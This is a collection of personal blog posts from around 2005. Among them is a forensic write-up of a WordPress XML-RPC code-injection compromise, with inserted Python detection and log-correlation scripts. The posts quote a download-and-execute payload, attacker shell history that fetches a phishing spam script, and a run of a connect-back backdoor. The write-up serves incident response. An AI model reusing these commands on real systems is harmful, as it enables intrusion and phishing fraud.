Music Stats

The other day Andy mentioned it didn’t seem like I had many female artists on my iPod, which is accurate, but it got me wondering what my actual mix was, so I ran a couple of random sets of 25 and 100 songs, and it comes out to about 70% male vocals, 15% female, and 15% instrumental, with a slight edge on the female vocals vs instrumental pieces. Which seems backwards to me, but it’s occurred to me that the instrumental songs (primarily post-rock and various types of electronic music) are longer on average.

It also occurred to me, while manually counting, that this type of structured tagging and listening pattern/music analysis would be insanely addictive and potentially useful, but I don’t think that there’s anything out there that currently does anything like that, and certainly nothing integrated with your music library.

On Engelbart

Doug Engelbart speaking

Tonight I went to Doug Engelbart’s presentation dubbed “Raising the Collective IQ,” sponsored by Future Salon. I wasn’t sure what exactly to expect, but I was glad to report that Doug was both quite lucid and the topic matter fairly interesting (if slightly vague towards the end).

The talk began with some insightful anecdotes recounting his early experiences that led him into his research, and then centered primarily on discussing capability infrastructure, mostly based on the last paper he published in 1992, Toward High-Performance Organizations: A Strategic Role for Groupware.

There were definite insightful comments on scaling these kinds of infrastructure, and the points on human system and physiological “component capabilities” have definitely been foremost in my mind recently in thinking about hacking process and organizational issues, both in corporate organization (ahem) and in social software contexts (ahem).

Also, these points definitely strongly touch two books I’ve read and recently enjoyed: Jeff Hawkins’ On Intelligence, which is about describing human intelligence in a memory-prediction neurological model, and Douglas Rushkoff’s latest book, Get Back in the Box, which has more than a few great a-ha moments.

Here’s a quote from one of Engelbart’s slides on capability infrastructure:

Consider that human capability (individual or collective) depends upon an integrated infrastructure of component capabilities.

That being said, the talk wasn’t all sunshine and roses. An implication of Engelbart’s talk was that the concepts he has been talking about, the Dynamic Knowledge Repository, and his CoDIAK/bootstrap model haven’t been implemented yet, and when one looks at the type of tools that are currently being developed and are obviously serving to augment collective intelligence, it seems to me that that’s not the case. Engelbart continues to talk about first steps and different models needed to implement DKRs and seems to dismiss things like the Wikipedia, and well, the Internet.

When you consider all the components that make up the modern online experience: search engines and the related portal tools, IM, social networks, community sites, forums, blogs, feed readers, etc, the amount of added mental bandwidth is pretty astounding. Sure, it’s loose and messy and a work in progress, but it seems to be exactly what Engelbart espouses. And like the command line of his AUGMENT system, yes it has a harsh learning curve, but when you master it, there’s a similarly proportionate payoff.

I’m not sure if this seeming blind spot is an artifact of a “worse is better” blind spot, or if it’s something else. Apparently, Engelbart has been using AUGMENT every day for the past 40 years. I’m sure in comparison, the response time and hypertext capabilities of the Web must be off-putting, but again, worse is better prevails because it was one thing that AUGMENT wasn’t: open.

I didn’t get to ask this question, but it seems ironic to me, especially in light of Engelbart’s praise early on for open source, that AUGMENT, even though in continuous use for the past 40 years, has never been released or cloned. Can you imagine the improvements that could be made if AUGMENT had itself adhered to the CoDIAK model and been collaboratively improved? Instead, we have the web, which did exactly that: a resource that has been incrementally and collaboratively developed over the past decade, and has turned into what is now the world’s largest information repository and communication tool.

Doug Engelbart is a visionary, his work and writing as far as 40 years back still has incredible relevance, his goals are laudable, and it was a real treat to hear him talk. I guess I’m just puzzled and a bit disappointed when he doesn’t see CoDIAK and NICs when they appear (at least to me) to be sitting right there. Maybe it’s one of those paradigmatic issues he talks about.

I’m online!

I finally got my net connection set up at home yesterday morning, and an unfortunate power outage led me to revisit my router setup tonight. It turns out that OpenWRT has been going through a lot of changes over the past year, with its latest version being a series of “white russian” releases.

Since I wanted to set up a captive portal anyway, I reinstalled and have been futzing around for the past couple hours, which, while not horribly productive, has been educational and fun, and most importantly, has not resulted in me bricking anything.

Right now it’s looking like WifiDog is my best bet for generating a captive portal, although I haven’t looked at how the ACLs are set up. I’m thinking that with the proper firewall (ebtables) and encryption setup, it might be possible to have both an open AP and something somewhat secure (I might be better off giving up on that or just having a separate AP for that, though).

Worth Posting

The MyWeb integration convinced me to switch my homepage to Yahoo! Search but my Firefox toolbar still defaults to Google, and I have to admit, I usually like the results for the latter better still. So, I thought it’d be worth noting that here’s a search where Yahoo! definitively did better:

What’s interesting to note, like my MyWeb experience, is that it wasn’t the pure algorithmic results that provided better results, but the Yahoo! Shortcut that answered my question. I love these sort of things (both on Google, which started pioneering the search as cmdline, and still has better parsing on some things), but I think the YubNub-like Shortcuts are just getting started in terms of fulfilling their potential. My idea of the new hotness: linking your shortcuts into your MyWeb community and then auto-promoting useful shortcuts based on a simple Ajax ‘was this helpful’ feedback mechanism.

End of the Year, Beginning of the Year

It’s been a hectic past few months, so I’m spending this new year’s eve wrapping up things and getting a head start on some things. I just finished making some last-minute year-end contributions (EFF, FSF, Wikipedia, Media Matters, and the Red Cross, among others). I’ve been spending the past couple days on cleaning and reorganizing my OmniOutliner todo list. I’m hoping to get to cleaning my notes files into the appropriate wikis (I’ve decided that this is the year that I move all my permanent online-reference/storage off of single machines and onto something theoretically more stable and easier to back up). I’ve also been ignoring this site recently, but as I get settled in (I finally have gotten my [fingers-crossed] permanent residence up north), I’m hoping to have some time and energy to try something new here.

Here’s to 2006.

Anatomy of the WP XML-RPC RFI Attack

These are being filtered by mod_security now, which makes it interesting to post:

HTTP/1.1 403 Forbidden
Content-Length: 212
Content-Type: text/html; charset=iso-8859-1
========================================
Request: 24.16.48.220 - - [19/Dec/2005:05:52:37 -0800] "POST /blog/xmlrpc.php HTTP/1.1" 403 221
Handler: (null)
----------------------------------------
POST /blog/xmlrpc.php HTTP/1.1
Host: 216.66.19.135
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)
Content-Type: text/xml
Content-Length: 269
mod_security-message: Access denied with code 403. Pattern match "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)" at HEADER
mod_security-action: 403

269
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 65.218.1.216/nikons;chmod +x nikons;./nikons `;echo '_end_';exit;/*</name></value></param></params></methodCall>
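Two things are worth pulling out of that capture. First, the payload is not a file inclusion in the classic sense: the `<name>` element closes a PHP string literal and a function call (`',''));`), runs a download-and-execute chain in backticks, and comments out the rest of the eval'd code with `/*`. Second, the mod_security rule that caught it only did so as a side effect: the pattern denies any POST whose Content-Type is not empty, form-urlencoded or multipart, so it rejects this request because it is `text/xml`, and it will reject legitimate XML-RPC clients (desktop blogging tools) for exactly the same reason. The following is an added example of mine, not code from the original post, that inspects an XML-RPC body for the injection pattern itself and models the Content-Type rule from the log. The regexes, the benign sample request, and the straight-quote reconstruction of the captured payload are my own assumptions.

```python
"""Added example (not from the original post): flag the PHP code-injection
pattern seen in the WordPress/PEAR XML-RPC attack, and model the
Content-Type rule from the mod_security log above."""
import re
import xml.etree.ElementTree as ET  # use defusedxml for untrusted input in production

# The vulnerable XML-RPC parsers eval()'d element text inside a PHP string
# literal.  The attacker closes the literal and the call, runs shell commands
# in backticks, and comments out whatever code follows with /*.
INDICATORS = {
    "php_string_breakout": re.compile(r"""['"]\s*(?:,\s*['"]{2}\s*)?\)+\s*;"""),
    "backtick_shell_exec": re.compile(r"`[^`]+`"),
    "download_and_execute": re.compile(r"\b(?:wget|curl|fetch)\b.*?\bchmod\s+\+x\b", re.S),
    "trailing_comment_tail": re.compile(r"\bexit\s*;\s*/\*\s*$"),
}


def text_nodes(body: str):
    """Every text node in the request.  If the XML does not parse, fall back
    to the raw body with tags stripped: the vulnerable PHP parsers were
    regex-based and did not need well-formed XML to reach eval()."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return [re.sub(r"<[^>]+>", "\n", body)]
    return [el.text for el in root.iter() if el.text and el.text.strip()]


def inspect_xmlrpc(body: str) -> dict:
    """Return the method name, the indicators hit, and a verdict."""
    hits = set()
    for text in text_nodes(body):
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits.add(name)
    method = re.search(r"<methodName>([^<]*)</methodName>", body)
    return {
        "method": method.group(1) if method else None,
        "indicators": sorted(hits),
        # The string breakout alone is decisive; otherwise require two signals.
        "malicious": "php_string_breakout" in hits or len(hits) >= 2,
    }


# The rule from the log: the Content-Type header must be empty,
# form-urlencoded or multipart, or the request is denied with 403.
MODSEC_CT_ALLOWED = re.compile(r"^$|^application/x-www-form-urlencoded$|^multipart/form-data")


def modsec_rule_blocks(content_type: str) -> bool:
    """True when the logged mod_security rule would deny this Content-Type."""
    return not MODSEC_CT_ALLOWED.search(content_type)


# Straight-quote reconstruction of the captured payload (assumption: the
# blog's rendering turned two single quotes into a curly double quote).
ATTACK_BODY = ('<?xml version="1.0"?><methodCall><methodName>test.method</methodName>'
               "<params><param><value><name>','')); echo '_begin_'; echo `cd /tmp;wget "
               "65.218.1.216/nikons;chmod +x nikons;./nikons `; echo '_end_'; exit;/*"
               "</name></value></param></params></methodCall>")

# Constructed benign request, the kind a blogging client sends.
BENIGN_BODY = ('<?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName>'
               "<params><param><value><string>appkey</string></value></param>"
               "<param><value><string>alice</string></value></param>"
               "<param><value><string>it's a secret ;)</string></value></param>"
               "</params></methodCall>")

if __name__ == "__main__":
    print(inspect_xmlrpc(ATTACK_BODY))
    print(inspect_xmlrpc(BENIGN_BODY))
    print(modsec_rule_blocks("text/xml"), modsec_rule_blocks("application/x-www-form-urlencoded"))
```

The point of the Content-Type function is the caveat: `modsec_rule_blocks("text/xml")` is true for the attack and for every honest XML-RPC client alike, so a rule like that is a blunt outage for xmlrpc.php, not a signature for this attack. Inspecting the body is what distinguishes the two.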

Dammit Leroy (Getting Haxored is No Fun)

I was in Starbucks earlier this evening (yesterday) catching up on some things before flying back up north when Gabe IM’d me that Apache was down. The machine was pinging (a bit slow, but it could have been my connection). No worries, log in and kick httpd…

When I logged in, load was high, which was a bit odd since Apache was down, but not unheard of… but top was showing that Postfix was the program chewing up my resources. The error I got restarting Apache gave me a sinking feeling:

Apache2(98)Address already in use: make_sock: could not bind to address 0.0.0.0:80

Now, there are perfectly plausible explanations for this type of error. This, however, is not one that you want:

snowball lhl # netstat -lnp | grep '0.0.0.0:80'
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     13715/r0nin  
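That netstat line is the whole diagnosis: port 80 is owned by a process called r0nin, not apache2. As an added example (mine, not from the original post), here is that check made routine: parse `netstat -lnp` output and report any listening socket whose owner is not the daemon expected on that port, or a port nobody expected at all. The expected-daemon table and the surrounding sample lines are constructed for the example around the line above; the check is only meaningful if the netstat binary itself is trusted, which is why the author re-fetched the basic utilities before relying on them.

```python
"""Added example (not from the original post): flag listening sockets whose
owning process is not the daemon expected on that port, from netstat -lnp
output.  Sample output is constructed around the r0nin line in the post."""
import re

# Assumption for the example: the daemons this host should have listening.
EXPECTED = {
    "22": {"sshd"},
    "25": {"master"},            # postfix's listener is the "master" process
    "80": {"apache2", "httpd"},
    "443": {"apache2", "httpd"},
}

SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      1033/master
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      13715/r0nin
tcp        0      0 0.0.0.0:1666            0.0.0.0:*               LISTEN      13720/dc
udp        0      0 0.0.0.0:123             0.0.0.0:*                           -
"""

# proto, recv-q, send-q, local addr:port, foreign addr, optional state, pid/program
LINE = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+(?:LISTEN\s+)?(\S+)\s*$")


def parse_listeners(netstat_output: str):
    """Yield (proto, addr, port, pid, program) for each socket line."""
    for line in netstat_output.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        proto, addr, port, owner = m.groups()
        if owner == "-":
            pid, program = None, None  # only root sees every socket's owner
        else:
            pid, program = owner.split("/", 1)
        yield proto, addr, port, pid, program


def unexpected_listeners(netstat_output: str):
    """Listeners on ports we did not expect, or on expected ports but owned by
    the wrong program.  Returns a list of (port, reason) findings."""
    findings = []
    for proto, addr, port, pid, program in parse_listeners(netstat_output):
        if program is None:
            findings.append((port, "unknown owner; rerun netstat as root"))
        elif port not in EXPECTED:
            findings.append((port, f"unexpected listener {program} (pid {pid})"))
        elif program not in EXPECTED[port]:
            findings.append((port, f"expected {sorted(EXPECTED[port])}, found {program} (pid {pid})"))
    return findings


if __name__ == "__main__":
    for port, reason in unexpected_listeners(SAMPLE_NETSTAT):
        print(f"port {port}: {reason}")
```

On the sample this reports r0nin on 80, the connect-back shell on 1666, and the unowned UDP socket as something to recheck as root. Treat an empty result as necessary, not sufficient: a kernel-level rootkit can hide sockets from netstat entirely, which is the case the author was worried about with the uselib and ptrace binaries.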

This was my first time any server I’ve run has been compromised, and it’s a bit embarrassing that it happened via remote file inclusion, but I suppose RFI is to traditional exploits how e-mail viruses were to the prior breed. It appears that my experience isn’t unique. I found several write-ups while I was doing forensic analysis (I’ll outline my process and rationale for any other poor souls so afflicted):

I’m going to try to get some sleep, so I’ll skip the narrative, and save some of the post-mortem / next steps for another time.

  • First I killed Postfix. I didn’t do an exact count, but I’m guesstimating that there was somewhere between 300K to 0.5M mails in the queue. I saved a couple but that actually turned out to not be necessary.
  • I found r0nin pretty quickly in /tmp along with some other files:
    brk, brk2, brk2.1, brk2.2, brk2.3, brk2.4, dc, dc.1, dc.2, dc.txt, kmod, kmod2, ptrace24, pwned, r0nin, r0nin.1, uselib24, uselib24.1, uselib24.2, uselib24.3, uselib24.4, w00t, w00t.1 — these are a mix of different versions, but also some duplicates. I chmod 000’d these and moved them to a forensics area.
  • I should probably mention that before doing those things, I did some sanity checks by checking my apt/sources.list and forcing fresh copies of chkrootkit and rkhunter, and basic utilities like netstat, who, ps, last etc to be reasonably sure (along w/ the nature of the compromise) that there wasn’t a live person at the other end. I also combed through the user files to look for anything unusual, but thankfully that seemed fine as well.
  • Next I killed just about everything and threw up ultra-paranoid iptables rules (everything off, SSH only from the IP I was sitting on and another safe entry point)
  • Grepping through my logs, these were the first things that popped out:
    error.log.1:--16:01:20--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin'
    error.log.1:16:01:20 (190.09 KB/s) - `r0nin' saved [19258/19258]
    error.log.1:--19:59:35--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin.1'
    error.log.1:19:59:35 (191.14 KB/s) - `r0nin.1' saved [19258/19258]
    error.log.1:--16:01:20--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin'
    error.log.1:16:01:20 (190.09 KB/s) - `r0nin' saved [19258/19258]
    error.log.1:--19:59:35--  http://www.full-comandos.com/sougay/r0nin
    error.log.1:           => `r0nin.1'
    error.log.1:19:59:35 (191.14 KB/s) - `r0nin.1' saved [19258/19258]

    These corresponded to the second here:

    avantbard.com-access.log:201.29.25.2 - - [16/Dec/2005:16:01:20 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 65 "-" "-"
    avantbard.com-access.log:201.29.25.2 - - [16/Dec/2005:19:59:35 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 13 "-" "-"
    

    Gabe was running an old and insecure version of WP (1.2) here. Because of the ways logs were rotated / split up, and since I was looking for a GET query string, not a POST, it took me a while to match up the exact attack vector, which was one of the reasons that the site was down for a few hours (I just didn’t feel comfortable putting stuff back up willy nilly).

  • One of the things I decided to install before opening any of the iptables back up was mod_security. I’m now running mod_security with most of this how-to’s options and the Snort ruleset. It’s rather draconian at the moment, but that’s probably a better place to work from.
  • Back to the spamming, there was a .bash_history in /var/tmp that showed what was actually done once the shell was exploitable. (This was only possible because my iptables weren’t properly loaded after reboots – now fixed)
    uname -a
    mkdir
    mkdir .teste
    mkdir .teste
    curl 
    curl -O www.canaldiboa.ubbi.com.br/enviar.pl
    mkdir .teste
    cd .teste
    pwd
    cd /tmp
    tmp
    /tmp
    mount tmp
    cd temp
    ls
    ls
    /temp
    ls
    cd /tmp
    ls
    cd .teste
    ls
    ls
    cd /tmp
    ls
    cd .teste
    ls
    mkdir .teste
    ls
    cd .teste
    ls
    wget www.canaldiboa.ubbi.com.br/enviar.pl
    wget www.receita-fazenda.com/lista.txt
    wget www.receita-fazenda.com/corpo.html
    sed -e 's/@acessototal.com.br/@ufba.br/g' lista.txt > lista2.txt
    perl enviar.pl lista2.txt Receita@receita.gov.br "URGENTE: Verifique seu CPF" corpo.html

    I ran a Sam Spade lookup on receita-fazenda.com and there are some interesting things here. The listed contact, Wayne Tanski, has caught the eye of another blogger, and there’s a site, http://dsoulzin.net/dsoul/ which has several perl/php scripts, no doubt for RFI. Wayne’s address is different from the one Sam Spade lists, but the connection of the dsoulzin domain name and the dsoulzin@hotmail.com mail address listed with the registrar is pretty telling. In any case, the enviar.pl is the script that did the actual mail queue injection, which now is adequate to explain everything.

  • But… not good enough for me. Despite what chkrootkit and rkhunter said, I had to make sure the binaries that were put in tmp (and obviously run) hadn’t rooted the box… I’m running a Debian kernel (2.4.27-2 + patches) and while something like ptrace should definitely not work, something like uselib had me a bit worried. So, having blocked the IPs that they’d most likely be contacting if they were to do so, and knowing they’d probably been run already, I su’d to www-data and ran them all…
    snowball test $ ./brk2
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.1
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.2
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.3
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./brk2.4
    [-] Unable to determine kernel address: Operation not supported
    snowball test $ ./kmod
    [-] Unable to attach: Operation not permitted
    Killed
    snowball test $ ./kmod2
    [-] Unable to attach: Operation not permitted
    Killed
    snowball test $ ./ptrace24 
    attached
    Password: 
    snowball test $ whoami
    www-data
    snowball test $ ./pwned 
    COMPILED AND HOSTED BY ALBANIA SECURITY CLAN
    irc.gigachat.net -j #ASC
    linux kernel msync race condition
    bug discovered by sd, 
    further research by sd and *****
    this is development-in-progress code,
    redistribution prohibited!
    =============================================
    Segmentation fault
    snowball test $ ./r0nin 
    PsychoPhobia Backdoor is starting...OK, pid = 9581
    snowball test $ ./dc randomfoo.net 1666
    Data Cha0s Connect Back Backdoor
    
    [*] Dumping Arguments
    [*] Resolving Host Name
    [*] Connecting...
    [*] Spawning Shell
    [*] Detached
    
    www-data  9583  0.0  0.0  1444  368 ?        S    03:08   0:00 ./r0nin
    www-data  9584  0.0  0.1  2748 1116 pts/10   S    03:08   0:00 shell
    www-data  9585  0.0  0.1  2528 1312 ttyp0    Ss+  03:08   0:00 sh -i
    
    snowball test $ ./uselib24
    
    [+] SLAB cleanup
        child 1 VMAs 81
    [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
    [+] vmalloc area 0xc0400000 - 0xc043742f
        Wait... \--> prepare_slab(), 255Mb
    
    [-] FAILED: try again 
    Killed
    
    
    [+] SLAB cleanup
        child 1 VMAs 65509
    [+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
    [+] vmalloc area 0xc0400000 - 0xc043742f
        Wait... \--> prepare_slab(), 255Mb
    
    [-] FAILED: try again 
    Killed
    
    snowball test $ ./w00t
    [-] Unable to determine kernel address: Operation not supported
    

    The good news is that except for r0nin, it looks like these were all busts. And now, with mod_security and working iptables rules, this shouldn’t be able to happen again.

Right now I’ve only re-enabled randomfoo since beyond the mod_security, it’s code I’ve written that I know isn’t susceptible to any of this crap. I’ve spent a good 8 hours at this point on the cleanup and writeup, but on the bright side, this was a fairly benign attack and I’ve gotten around to doing a whole bunch of stuff I’ve been putting off. More on that after I get some sleep and after the, you know, day job.
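The step that cost the most time above was matching the wget lines in error.log to the request that spawned them: a POST body never appears in the access log, so grepping for the download URL or a query string finds nothing, and the only join key is the timestamp. The following is an added example of mine, not code from the original post, that does that join mechanically: it parses the access log for requests, parses the wget progress lines from error.log (wget writes to stderr, which Apache collects when PHP spawns it), and for each download returns the request that landed within a couple of seconds before it, preferring POSTs to PHP endpoints. The sample lines are built from the excerpts above; the date attached to the error-log times is an assumption, because wget prints only the time of day.

```python
"""Added example (not from the original post): correlate wget download lines
in Apache's error log with requests in the access log to find the request
that triggered the download.  Sample log lines are constructed from the
excerpts in the post."""
import re
from datetime import date, datetime, timedelta

ACCESS_LOG = """\
201.29.25.2 - - [16/Dec/2005:15:58:02 -0800] "GET /corral/ HTTP/1.1" 200 8123 "-" "-"
201.29.25.2 - - [16/Dec/2005:16:01:20 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 65 "-" "-"
10.0.0.5 - - [16/Dec/2005:16:01:21 -0800] "GET /randomfoo/ HTTP/1.1" 200 4411 "-" "Mozilla/5.0"
201.29.25.2 - - [16/Dec/2005:19:59:35 -0800] "POST /corral//xmlrpc.php HTTP/1.1" 200 13 "-" "-"
"""

ERROR_LOG = """\
--16:01:20--  http://www.full-comandos.com/sougay/r0nin
           => `r0nin'
16:01:20 (190.09 KB/s) - `r0nin' saved [19258/19258]
--19:59:35--  http://www.full-comandos.com/sougay/r0nin
           => `r0nin.1'
19:59:35 (191.14 KB/s) - `r0nin.1' saved [19258/19258]
"""

SAMPLE_DAY = date(2005, 12, 16)  # assumption: the day the rotated error log covers

# ip, timestamp (without zone; both logs are in local time), method, path, status
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[(\S+) [+-]\d{4}\] "(\S+) (\S+) [^"]*" (\d{3})')
# wget's start-of-download line: --HH:MM:SS--  URL
WGET_RE = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s+(\S+)")


def parse_access(text):
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        yield {"ip": ip, "time": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S"),
               "method": method, "path": path, "status": int(status)}


def parse_wget(text, day):
    """Yield each download with a full datetime built from `day` plus the
    time-of-day wget printed."""
    for line in text.splitlines():
        m = WGET_RE.match(line)
        if m:
            t = datetime.strptime(m.group(1), "%H:%M:%S").time()
            yield {"time": datetime.combine(day, t), "url": m.group(2)}


def correlate(access_text, error_text, day, window=timedelta(seconds=2)):
    """For each download, the request that landed at most `window` before it.
    Returns a list of (url, request-or-None)."""
    requests = list(parse_access(access_text))
    matches = []
    for dl in parse_wget(error_text, day):
        candidates = [r for r in requests
                      if timedelta(0) <= dl["time"] - r["time"] <= window]
        # Prefer POSTs to PHP endpoints: their bodies are not logged, which is
        # exactly why a grep for the URL in the query string comes up empty.
        candidates.sort(key=lambda r: (r["method"] != "POST",
                                       not r["path"].endswith(".php")))
        matches.append((dl["url"], candidates[0] if candidates else None))
    return matches


def attacker_ips(matches):
    """Source addresses of the requests that triggered downloads."""
    return {req["ip"] for _, req in matches if req is not None}


if __name__ == "__main__":
    for url, req in correlate(ACCESS_LOG, ERROR_LOG, SAMPLE_DAY):
        print(url, "<-", req and f'{req["ip"]} {req["method"]} {req["path"]}')
    print(attacker_ips(correlate(ACCESS_LOG, ERROR_LOG, SAMPLE_DAY)))
```

Both downloads resolve to the POSTs to /corral//xmlrpc.php from 201.29.25.2; the unrelated GET one second later is excluded because it arrived after the download started. Widen the window on a loaded box where PHP may take a few seconds to reach the wget, and run it against every rotated access log for the day, since the split across log files was the other half of what made this slow by hand.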

BWAHAHAHA

Be sure to check out the BBC article after you’ve spotted this.

Patient and steady with all he must bear,
Ready to meet every challenge with care,
Easy in manner, yet solid as steel,
Strong in his faith, refreshingly real.
Isn’t afraid to propose what is bold,
Doesn’t conform to the usual mould,
Eyes that have foresight, for hindsight won’t do,
Never backs down when he sees what is true,
Tells it all straight, and means it all too.
Going forward and knowing he’s right,
Even when doubted for why he would fight,
Over and over he makes his case clear,
Reaching to touch the ones who won’t hear.
Growing in strength he won’t be unnerved,
Ever assuring he’ll stand by his word.
Wanting the world to join his firm stand,
Bracing for war, but praying for peace,
Using his power so evil will cease,
So much a leader and worthy of trust,
Here stands a man who will do what he must.

Old Blog Posts

Doing a few searches for old posts reminded me that I used to occasionally have interesting things to say. A couple of years ago, I had talked about creating a random-post function for the blog that could also be a good way to bring up a post for categorization, tagging, updating, annotating… This is still a good idea. If I’m as busy as I’ve been, this might sit here for a while reminding me of things I could be doing on the blog.